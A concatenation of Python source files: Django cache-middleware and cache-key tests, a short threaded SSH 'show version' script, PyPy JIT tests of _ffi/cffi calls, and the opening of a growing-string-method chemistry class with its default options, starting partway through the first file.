request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHE_MIDDLEWARE_ANONYMOUS_ONLY=False,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(IgnoreDeprecationWarningsMixin, TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache_anonymous_only, False)
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_anonymous_only, False)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_anonymous_only=True, cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache_anonymous_only, True)
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertEqual(result, None)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertEqual(result, None)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
@override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
def test_cache_middleware_anonymous_only_wont_cause_session_access(self):
""" The cache middleware shouldn't cause a session access due to
CACHE_MIDDLEWARE_ANONYMOUS_ONLY if nothing else has accessed the
session. Refs 13283 """
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth.middleware import AuthenticationMiddleware
middleware = CacheMiddleware()
session_middleware = SessionMiddleware()
auth_middleware = AuthenticationMiddleware()
request = self.factory.get('/view_anon/')
# Put the request through the request middleware
session_middleware.process_request(request)
auth_middleware.process_request(request)
result = middleware.process_request(request)
self.assertEqual(result, None)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
session_middleware.process_response(request, response)
response = middleware.process_response(request, response)
self.assertEqual(request.session.accessed, False)
@override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
def test_cache_middleware_anonymous_only_with_cache_page(self):
"""CACHE_MIDDLEWARE_ANONYMOUS_ONLY should still be effective when used
with the cache_page decorator: the response to a request from an
authenticated user should not be cached."""
request = self.factory.get('/view_anon/')
class MockAuthenticatedUser(object):
def is_authenticated(self):
return True
class MockAccessedSession(object):
accessed = True
request.user = MockAuthenticatedUser()
request.session = MockAccessedSession()
response = cache_page(60)(hello_world_view)(request, '1')
self.assertFalse("Cache-Control" in response)
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestEtagWithAdmin(TestCase):
# See https://code.djangoproject.com/ticket/16003
urls = "admin_views.urls"
def test_admin(self):
with self.settings(USE_ETAGS=False):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertFalse(response.has_header('ETag'))
with self.settings(USE_ETAGS=True):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertTrue(cache1 is cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertFalse(c[0] is c[1])
|
ex2_show_version.py | import threading
from my_functions import ssh_command
from datetime import datetime
from my_devices import device_list
def thread_main():
start_time = datetime.now()
threads=[]
for a_device in device_list:
my_thread = threading.Thread(target=ssh_command, args=(a_device,"show version"))
threads.append(my_thread)
my_thread.start()
for my_thread in threads:
my_thread.join()
end_time = datetime.now()
print(f"\nElapsed time is {end_time - start_time}")
if __name__ == "__main__":
thread_main()
|
test_ffi.py | import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
i = 0
res = 0
while i < 300:
tmp = pow(2, 3) # ID: fficall
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
if 'ConstClass(pow)' in repr(loop): # e.g. OS/X
pow_addr = 'ConstClass(pow)'
assert loop.match_by_id('fficall', """
guard_not_invalidated(descr=...)
i17 = force_token()
setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""" % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
def mypow(a, b):
return pow(a, b)
i = 0
res = 0
while i < 300:
tmp = mypow(2, 3)
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
opnames = log.opnames(loop.allops())
# we only force the virtualref, not its content
assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
from rpython.rlib.clibffi import get_libc_name
def main(libc_name, n):
import time
import os
from threading import Thread
#
if os.name == 'nt':
from _rawffi.alt import WinDLL, types
libc = WinDLL('Kernel32.dll')
sleep = libc.getfunc('Sleep', [types.uint], types.uint)
delays = [0]*n + [1000]
else:
from _rawffi.alt import CDLL, types
libc = CDLL(libc_name)
sleep = libc.getfunc('sleep', [types.uint], types.uint)
delays = [0]*n + [1]
#
def loop_of_sleeps(i, delays):
for delay in delays:
sleep(delay) # ID: sleep
#
threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
start = time.time()
for i, thread in enumerate(threads):
thread.start()
for thread in threads:
thread.join()
end = time.time()
return end - start
log = self.run(main, [get_libc_name(), 200], threshold=150,
import_site=True)
assert 1 <= log.result <= 1.5 # at most 0.5 seconds of overhead
loops = log.loops_by_id('sleep')
assert len(loops) == 1 # make sure that we actually JITted the loop
def test_ctypes_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
import ctypes
libm = ctypes.CDLL(libm_name)
fabs = libm.fabs
fabs.argtypes = [ctypes.c_double]
fabs.restype = ctypes.c_double
x = -4
i = 0
while i < 300:
x = fabs(x)
x = x - 100
i += 1
return fabs._ptr.getaddr(), x
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name], import_site=True)
fabs_addr, res = log.result
assert res == -4.0
loop, = log.loops_by_filename(self.filepath)
ops = loop.allops()
opnames = log.opnames(ops)
assert opnames.count('new_with_vtable') == 1 # only the virtualref
py.test.skip("XXX re-optimize _ffi for the JIT?")
assert opnames.count('call_release_gil') == 1
idx = opnames.index('call_release_gil')
call = ops[idx]
assert (call.args[0] == 'ConstClass(fabs)' or # e.g. OS/X
int(call.args[0]) == fabs_addr)
def test__ffi_struct(self):
def main():
from _rawffi.alt import _StructDescr, Field, types
fields = [
Field('x', types.slong),
]
descr = _StructDescr('foo', fields)
struct = descr.allocate()
i = 0
while i < 300:
x = struct.getfield('x') # ID: getfield
x = x+1
struct.setfield('x', x) # ID: setfield
i += 1
return struct.getfield('x')
#
log = self.run(main, [])
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('getfield', """
guard_not_invalidated(descr=...)
i57 = getfield_raw(i46, descr=<FieldS dynamic 0>)
""")
assert loop.match_by_id('setfield', """
setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
""")
def test__cffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BInt = _cffi_backend.new_primitive_type("int")
BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
ldexp = libm.load_function(BPow, 'ldexp')
i = 0
res = 0
while i < 300:
tmp = ldexp(1, 3) # ID: cfficall
res += tmp
i += 1
BLong = _cffi_backend.new_primitive_type("long")
ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
return ldexp_addr, res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
ldexp_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
f97 = call_release_gil(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test_cffi_call_guard_not_forced_fails(self):
# this is the test_pypy_c equivalent of
# rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
#
# it requires cffi to be installed for pypy in order to run
def main():
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
typedef void (*functype)(int);
int foo(int n, functype func);
""")
lib = ffi.verify("""
#include <signal.h>
typedef void (*functype)(int);
int foo(int n, functype func) {
if (n >= 2000) {
func(n);
}
return n*2;
}
""")
@ffi.callback("functype")
def mycallback(n):
if n < 5000:
return
# make sure that guard_not_forced fails
d = {}
f = sys._getframe()
while f:
d.update(f.f_locals)
f = f.f_back
n = 0
while n < 10000:
res = lib.foo(n, mycallback) # ID: cfficall
# this is the real point of the test: before the
# refactor-call_release_gil branch, the assert failed when
# res == 5000
assert res == n*2
n += 1
return n
log = self.run(main, [], import_site=True,
discard_stdout_before_last_line=True) # <- for Win32
assert log.result == 10000
loop, = log.loops_by_id('cfficall')
assert loop.match_by_id('cfficall', """
...
f1 = call_release_gil(..., descr=<Calli 4 ii EF=7 OS=62>)
...
""")
def test__cffi_bug1(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BSin = _cffi_backend.new_function_type([BDouble], BDouble)
sin = libm.load_function(BSin, 'sin')
def f(*args):
for i in range(300):
sin(*args)
f(1.0)
f(1)
#
libm_name = get_libm_name(sys.platform)
self.run(main, [libm_name])
# assert did not crash
def test_cffi_init_struct_with_list(self):
def main(n):
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
struct s {
short x;
short y;
short z;
};
""")
for i in xrange(n):
ffi.new("struct s *", [i, i, i])
log = self.run(main, [300])
loop, = log.loops_by_filename(self.filepath)
assert loop.match("""
i161 = int_lt(i160, i43)
guard_true(i161, descr=...)
i162 = int_add(i160, 1)
setfield_gc(p22, i162, descr=<FieldS pypy.module.__builtin__.functional.W_XRangeIterator.inst_current .>)
guard_not_invalidated(descr=...)
p163 = force_token()
p164 = force_token()
p165 = getarrayitem_gc(p67, 0, descr=<ArrayP .>)
guard_value(p165, ConstPtr(ptr70), descr=...)
p166 = getfield_gc(p165, descr=<FieldP pypy.objspace.std.dictmultiobject.W_DictMultiObject.inst_strategy .+>)
guard_value(p166, ConstPtr(ptr72), descr=...)
p167 = call(ConstClass(_ll_0_alloc_with_del___), descr=<Callr . EF=5>)
guard_no_exception(descr=...)
i112 = int_signext(i160, 2)
setfield_gc(p167, ConstPtr(ptr85), descr=<FieldP pypy.module._cffi_backend.cdataobj.W_CData.inst_ctype .+>)
i114 = int_ne(i160, i112)
guard_false(i114, descr=...)
--TICK--
i119 = call(ConstClass(_ll_1_raw_malloc_varsize__Signed), 6, descr=<Calli . i EF=5 OS=110>)
raw_store(i119, 0, i160, descr=<ArrayS 2>)
raw_store(i119, 2, i160, descr=<ArrayS 2>)
raw_store(i119, 4, i160, descr=<ArrayS 2>)
setfield_gc(p167, i119, descr=<FieldU pypy.module._cffi_backend.cdataobj.W_CData.inst__ptr .+>)
i123 = arraylen_gc(p67, descr=<ArrayP .>)
jump(..., descr=...)
""")
|
gsm.py | from __future__ import print_function
# local application imports
import sys
import os
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from coordinate_systems import Distance, Angle, Dihedral, OutOfPlane
from utilities import nifty, options, block_matrix
from wrappers import Molecule
from utilities.manage_xyz import write_molden_geoms
# standard library imports
# third party
import numpy as np
import multiprocessing as mp
from collections import Counter
from copy import copy
from itertools import chain
def worker(arg):
obj, methname = arg[:2]
return getattr(obj, methname)(*arg[2:])
#######################################################################################
#### This class contains the main constructor, object properties and staticmethods ####
#######################################################################################
# TODO interpolate is still sloppy. It shouldn't create a new molecule node itself
# but should create the xyz. GSM should create the new molecule based off that xyz.
# TODO nconstraints in ic_reparam and write_iters is irrelevant
class GSM(object):
from utilities import units
@staticmethod
def default_options():
if hasattr(GSM, '_default_options'):
return GSM._default_options.copy()
opt = options.Options()
opt.add_option(
key='reactant',
required=True,
# allowed_types=[Molecule,wrappers.Molecule],
doc='Molecule object as the initial reactant structure')
opt.add_option(
key='product',
required=False,
# allowed_types=[Molecule,wrappers.Molecule],
doc='Molecule object for the product structure (not required for single-ended methods.')
opt.add_option(
key='nnodes',
required=False,
value=1,
allowed_types=[int],
doc="number of string nodes"
)
opt.add_option(
key='optimizer',
required=True,
doc='Optimzer object to use e.g. eigenvector_follow, conjugate_gradient,etc. \
most of the default options are okay for here since GSM will change them anyway',
)
opt.add_option(
key='driving_coords',
required=False,
value=[],
allowed_types=[list],
doc='Provide a list of tuples to select coordinates to modify atoms\
indexed at 1')
opt.add_option(
key='CONV_TOL',
value=0.0005,
required=False,
allowed_types=[float],
doc='Convergence threshold'
)
opt.add_option(
key='CONV_gmax',
value=0.001,
required=False,
allowed_types=[float],
doc='Convergence threshold'
)
opt.add_option(
key='CONV_Ediff',
value=0.1,
required=False,
allowed_types=[float],
doc='Convergence threshold'
)
opt.add_option(
key='CONV_dE',
value=0.5,
required=False,
allowed_types=[float],
doc='Convergence threshold'
)
opt.add_option(
key='ADD_NODE_TOL',
value=0.1,
required=False,
allowed_types=[float],
doc='Convergence threshold')
opt.add_option(
key="growth_direction",
value=0,
required=False,
doc="how to grow string,0=Normal,1=from reactant"
)
opt.add_option(
key="DQMAG_MAX",
value=0.8,
required=False,
doc="max step along tangent direction for SSM"
)
opt.add_option(
key="DQMAG_MIN",
value=0.2,
required=False,
doc=""
)
opt.add_option(
key='print_level',
value=1,
required=False
)
